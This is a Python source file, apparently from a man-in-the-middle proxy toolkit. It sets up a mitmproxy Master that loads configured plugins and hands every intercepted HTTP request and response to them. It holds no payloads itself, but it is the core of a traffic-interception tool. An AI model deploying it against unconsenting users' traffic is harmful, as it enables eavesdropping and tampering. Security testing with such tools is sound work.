try: from mitmproxy import controller, proxy from mitmproxy.proxy.server import ProxyServer except: from libmproxy import controller, proxy from libmproxy.proxy.server import ProxyServer from plugins import * from threading import Thread from core.config.settings import SettingsINI # MIT License # # Copyright (c) 2018 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. class ThreadController(Thread): def __init__(self,main ,parent=None): super(ThreadController, self).__init__(parent) self.main = main def run(self): try: controller.Master.run(self.main) except KeyboardInterrupt: self.main.shutdown() def stop(self): self.main.shutdown() class MasterHandler(controller.Master): def __init__(self, server,session): controller.Master.__init__(self, server) self.config = SettingsINI('core/pumpkinProxy.ini') self.session = session self.plugins = [] self.initializePlugins() def run(self): self.thread = ThreadController(self) self.thread.start() def disablePlugin(self,name): ''' disable plugin by name ''' print('plugin:{} status:OFF'.format(name)) for plugin in self.plugins: if plugin.name == name: self.plugins.remove(plugin) def initializePlugins(self): plugin_classes = plugin.PluginTemplate.__subclasses__() for p in plugin_classes: if self.config.get_setting('plugins',p.name,format=bool): print('plugins::{0:20} status:On'.format(p.name)) self.plugins.append(p()) # initialize logging in all plugins enable for instance in self.plugins: instance.init_logger(self.session) def handle_request(self, flow): ''' print "-- request --" print flow.__dict__ print flow.request.__dict__ print flow.request.headers.__dict__ print "--------------" print ''' for p in self.plugins: p.request(flow) flow.reply() def handle_response(self, flow): ''' print print "-- response --" print flow.__dict__ print flow.response.__dict__ print flow.response.headers.__dict__ print "--------------" print ''' for p in self.plugins: p.response(flow) #print flow.__dict__ flow.reply()
1.882813
2